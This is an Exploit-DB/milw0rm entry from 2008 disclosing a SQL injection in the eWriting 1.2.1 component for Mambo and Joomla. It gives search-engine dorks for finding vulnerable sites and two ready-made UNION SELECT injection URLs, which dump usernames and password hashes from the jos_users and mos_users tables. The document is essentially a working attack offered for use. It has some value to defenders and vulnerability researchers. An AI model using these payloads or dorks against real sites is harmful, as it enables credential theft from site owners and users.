Mambo Component eWriting 1.2.1 - 'cat' SQL Injection

EDB-ID:

5226


Author:

Don

Type:

webapps


Platform:

PHP

Date:

2008-03-10


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

eWriting 1.2.1 - SQL injection

# Discovered by breaker_unit & Don

# BHack

# b4lc4n.org

# Gretz to h4cky0u.org l r00tsecurity.org l h4cky0u.biz l

Dorks:

"Powered by eWriting 1.2.1
allinurl:"com_ewriting"

Joomla!
/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+jos_users--

Mambo
/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+mos_users--

++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2008-03-10]